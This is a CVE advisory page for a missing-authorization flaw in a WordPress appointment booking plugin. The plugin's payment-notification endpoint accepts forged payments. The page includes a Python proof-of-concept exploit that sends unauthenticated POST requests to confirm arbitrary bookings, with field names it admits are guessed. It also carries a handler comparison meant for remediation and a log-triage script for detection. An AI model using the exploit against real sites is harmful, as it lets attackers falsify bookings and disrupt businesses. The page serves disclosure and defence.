Security Vulnerability Report

CVE-2025-13317

Published: 2025-11-22 08:15:44
Last Modified: 2026-04-15 00:35:42

Description

The Appointment Booking Calendar plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.3.96. This is due to the plugin exposing an unauthenticated booking processing endpoint (cpabc_appointments_check_IPN_verification) that trusts attacker-supplied payment notifications without verifying their origin, authenticity, or requiring proper authorization checks. This makes it possible for unauthenticated attackers to arbitrarily confirm bookings and insert them into the live calendar via the 'cpabc_ipncheck' parameter, triggering administrative and customer notification emails and disrupting operations.
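The description above is the classic unverified payment-notification (IPN) flaw: the handler treats whatever arrives in the request body as proof of payment. The block below is an added example written for this page, not code from the plugin, the advisory or Wordfence. It puts the trusting pattern beside a hardened handler that (1) echoes the raw notification back to the payment processor and proceeds only on "VERIFIED", (2) checks the receiver account, (3) rejects replayed transaction ids, (4) requires a still-pending booking and (5) checks amount and currency against the quoted price. Everything beyond the CVE text is an assumption: the PayPal-style field names (payment_status, txn_id, receiver_email, mc_gross, mc_currency, custom), the merchant address merchant@example.com, booking 12345 at 40.00 USD, and the processor round-trip, which is injected as a callable so the example runs offline.

```python
"""Added example (not the plugin's or the advisory's code): the trusting IPN
handler pattern from CVE-2025-13317 beside a hardened handler. Assumed, not
from the page: PayPal-style IPN field names (payment_status, txn_id,
receiver_email, mc_gross, mc_currency, custom) and a processor that answers
"VERIFIED" when the raw body is echoed back; that round-trip is injected as a
callable so the example runs offline."""
from dataclasses import dataclass, field
from decimal import Decimal, InvalidOperation
from typing import Callable, Dict, Set
import urllib.parse

@dataclass
class Booking:
    amount: Decimal
    currency: str
    status: str = "pending"

@dataclass
class Store:
    merchant_email: str
    bookings: Dict[str, Booking]
    seen_txn_ids: Set[str] = field(default_factory=set)

def parse_ipn(raw_body: str) -> Dict[str, str]:
    """Form-encoded IPN body -> dict (blank values kept, last value wins)."""
    return dict(urllib.parse.parse_qsl(raw_body, keep_blank_values=True))

def vulnerable_ipn_handler(store: Store, params: Dict[str, str]) -> bool:
    """The flaw the advisory describes: the request body alone decides whether a
    booking is confirmed; no origin, authenticity or authorization check."""
    booking = store.bookings.get(params.get("custom", ""))
    if booking is None or params.get("payment_status") != "Completed":
        return False
    booking.status = "confirmed"   # admin/customer e-mails would be sent here
    return True

def hardened_ipn_handler(store: Store, params: Dict[str, str], raw_body: str,
                         verify_with_processor: Callable[[str], str]) -> bool:
    """Confirm only if the processor vouches for this exact notification and
    its contents match the booking we expected to be paid for."""
    # 1. Origin/authenticity: the processor must acknowledge the unmodified body.
    if verify_with_processor(raw_body) != "VERIFIED":
        return False
    # 2. The payment must be to our account, not one the attacker controls.
    if params.get("receiver_email", "").lower() != store.merchant_email.lower():
        return False
    # 3. Replay protection: each processor transaction id is honoured once.
    txn_id = params.get("txn_id", "")
    if not txn_id or txn_id in store.seen_txn_ids:
        return False
    # 4. The referenced booking must exist and still be awaiting payment.
    booking = store.bookings.get(params.get("custom", ""))
    if booking is None or booking.status != "pending":
        return False
    # 5. Amount, currency and payment state must match what we quoted.
    try:
        paid = Decimal(params.get("mc_gross", ""))
    except InvalidOperation:
        return False
    if (paid != booking.amount or params.get("mc_currency") != booking.currency
            or params.get("payment_status") != "Completed"):
        return False
    store.seen_txn_ids.add(txn_id)
    booking.status = "confirmed"
    return True

def make_processor(issued_bodies: Set[str]) -> Callable[[str], str]:
    """Offline stand-in for the processor's validation endpoint: vouches only
    for notification bodies it actually issued, byte for byte."""
    return lambda raw_body: "VERIFIED" if raw_body in issued_bodies else "INVALID"

def demo() -> Dict[str, bool]:
    """Runs both handlers against constructed notifications for booking 12345."""
    def fresh() -> Store:
        return Store("merchant@example.com", {"12345": Booking(Decimal("40.00"), "USD")})
    base = dict(payment_status="Completed", receiver_email="merchant@example.com",
                mc_gross="40.00", mc_currency="USD", custom="12345")
    genuine = urllib.parse.urlencode({**base, "txn_id": "7AB12345CD678901E"})
    forged = urllib.parse.urlencode({**base, "txn_id": "FORGED-0001"})
    underpaid = urllib.parse.urlencode({**base, "txn_id": "8CD98765EF432109F", "mc_gross": "1.00"})
    processor = make_processor({genuine, underpaid})   # only real transactions
    results: Dict[str, bool] = {}
    store = fresh()
    results["forged_vulnerable"] = vulnerable_ipn_handler(store, parse_ipn(forged))
    store = fresh()
    results["forged_hardened"] = hardened_ipn_handler(store, parse_ipn(forged), forged, processor)
    results["genuine_hardened"] = hardened_ipn_handler(store, parse_ipn(genuine), genuine, processor)
    results["replay_hardened"] = hardened_ipn_handler(store, parse_ipn(genuine), genuine, processor)
    results["underpaid_hardened"] = hardened_ipn_handler(fresh(), parse_ipn(underpaid), underpaid, processor)
    return results

if __name__ == "__main__":
    for name, confirmed in demo().items():
        print(f"{name:20s} confirmed={confirmed}")
```

The forged notification confirms the booking under the vulnerable handler and is rejected by the hardened one; a genuine notification is accepted once and rejected on replay; a genuine notification for the wrong amount is rejected even though the processor vouches for it, which is the check that the origin test alone does not give you. In production the `verify_with_processor` callable is an HTTPS POST of the unmodified body to the processor's validation endpoint, and the handler must additionally be unreachable for anything but that callback flow.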

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Weakness
CWE-862 (Missing Authorization)

Configurations (Affected Products)


Appointment Booking Calendar plugin for WordPress <= 1.3.96

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-13317 PoC
# Missing Authorization in Appointment Booking Calendar < 1.3.97
# Attackers can confirm arbitrary bookings via the cpabc_ipncheck parameter


def exploit(target_url, booking_id):
    """Exploit for CVE-2025-13317

    Args:
        target_url: Target WordPress site URL
        booking_id: ID of the booking to confirm

    Returns:
        (response body, HTTP status) from the server, or (error text, None)
    """
    # Target endpoint exposed by the plugin, reached via the cpabc_ipncheck parameter
    endpoint = f"{target_url.rstrip('/')}/?cpabc_ipncheck=1"

    # Payload to confirm an arbitrary booking.
    # The endpoint trusts attacker-supplied data without verification.
    # NOTE: the advisory names only the 'cpabc_ipncheck' parameter. The other
    # field names below are this PoC's guesses, not documented on this page;
    # confirm them against the handler in inc/cpabc_apps_go.inc.php (see
    # References) before relying on them.
    data = {
        'cpabc_ipncheck': '1',
        'booking_id': str(booking_id),
        'status': 'confirmed',
        'payment_status': 'completed',
    }

    # Send the request without any authentication or session cookie
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        return response.text, response.status_code
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}", None


if __name__ == '__main__':
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-13317.py <target_url> <booking_id>")
        print("Example: python cve-2025-13317.py http://example.com 12345")
        sys.exit(1)

    target = sys.argv[1]
    booking = sys.argv[2]

    print(f"[*] Exploiting CVE-2025-13317 on {target}")
    print(f"[*] Attempting to confirm booking ID: {booking}")

    result, status = exploit(target, booking)
    print(f"[*] Response Status: {status}")
    print(f"[*] Response: {result[:500]}")
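Every exploitation attempt, including the PoC above, has to pass through the web server with cpabc_ipncheck in the query string, so access logs are the first place to look after patching. The block below is an added triage example for this page, not part of the original page or the plugin: it parses Apache/nginx "combined" log lines, flags requests whose query string carries cpabc_ipncheck (after percent-decoding and case-folding, so an encoded `CPABC%5Fipncheck` is not missed), and groups the hits by client address and user agent. The log format, the sample lines (documentation-range addresses, illustrative user agents) and the grouping are assumptions; the advisory only establishes the parameter name. Legitimate processor callbacks also hit this URL, so the output is a list to triage, not a verdict: bursts from one client with a scripting user agent, or confirmations with no matching processor transaction, are what to look for.

```python
"""Added example, not part of the original page or the plugin: triage of web
server access logs for requests to the cpabc_ipncheck endpoint. Log format,
sample lines and grouping are assumptions; only the parameter name comes from
the advisory."""
import re
import urllib.parse
from collections import Counter
from typing import Dict, List, Optional

# Constructed sample lines in Apache/nginx "combined" format, not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [22/Nov/2025:09:14:02 +0000] "POST /?cpabc_ipncheck=1 HTTP/1.1" 200 512 "-" "python-requests/2.32.3"
203.0.113.7 - - [22/Nov/2025:09:14:03 +0000] "POST /?cpabc_ipncheck=1 HTTP/1.1" 200 512 "-" "python-requests/2.32.3"
198.51.100.20 - - [22/Nov/2025:09:15:40 +0000] "GET /?p=42 HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
192.0.2.9 - - [22/Nov/2025:09:16:11 +0000] "POST /index.php?CPABC%5Fipncheck=1&x=1 HTTP/1.1" 200 512 "-" "curl/8.4.0"
"""

COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
PARAM = "cpabc_ipncheck"   # the only identifier the advisory gives us


def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """One combined-format line -> fields, or None if it does not parse."""
    m = COMBINED.match(line)
    return m.groupdict() if m else None


def targets_ipn_endpoint(target: str) -> bool:
    """True if the query string carries cpabc_ipncheck. parse_qsl percent-decodes
    parameter names, and we case-fold, so encoding tricks do not evade the match."""
    query = urllib.parse.urlsplit(target).query
    names = {name.lower() for name, _ in urllib.parse.parse_qsl(query, keep_blank_values=True)}
    return PARAM in names


def hunt(log_text: str) -> Dict[str, object]:
    """Collect every request to the endpoint and summarise by client and agent."""
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec and targets_ipn_endpoint(rec["target"]):
            hits.append(rec)
    return {
        "hits": hits,
        "by_ip": Counter(h["ip"] for h in hits),
        "by_ua": Counter(h["ua"] for h in hits),
    }


if __name__ == "__main__":
    report = hunt(SAMPLE_LOG)
    for h in report["hits"]:
        print(f'{h["ts"]} {h["ip"]:15s} {h["method"]:4s} {h["target"]} ua={h["ua"]}')
    print("by client:", dict(report["by_ip"]))
    print("by agent: ", dict(report["by_ua"]))
```

Run it against a real access log by replacing `SAMPLE_LOG` with the file contents; the two-line burst from 203.0.113.7 with a python-requests agent is the shape the PoC above would leave behind, and the encoded request from 192.0.2.9 shows why matching on the literal string `cpabc_ipncheck` in the raw line is not enough.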

References

https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L14
https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L363
https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L476
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399113%40appointment-booking-calendar&new=3399113%40appointment-booking-calendar&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/638217c4-7a37-49e4-8660-5510ace692ec?source=cve
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13317",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-22T08:15:44.417",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Appointment Booking Calendar plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.3.96. This is due to the plugin exposing an unauthenticated booking processing endpoint (cpabc_appointments_check_IPN_verification) that trusts attacker-supplied payment notifications without verifying their origin, authenticity, or requiring proper authorization checks. This makes it possible for unauthenticated attackers to arbitrarily confirm bookings and insert them into the live calendar via the 'cpabc_ipncheck' parameter, triggering administrative and customer notification emails and disrupting operations."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "references": [
      {"url": "https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L14", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L363", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/browser/appointment-booking-calendar/tags/1.3.96/inc/cpabc_apps_go.inc.php#L476", "source": "[email protected]"},
      {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3399113%40appointment-booking-calendar&new=3399113%40appointment-booking-calendar&sfp_email=&sfph_mail=", "source": "[email protected]"},
      {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/638217c4-7a37-49e4-8660-5510ace692ec?source=cve", "source": "[email protected]"}
    ]
  }
}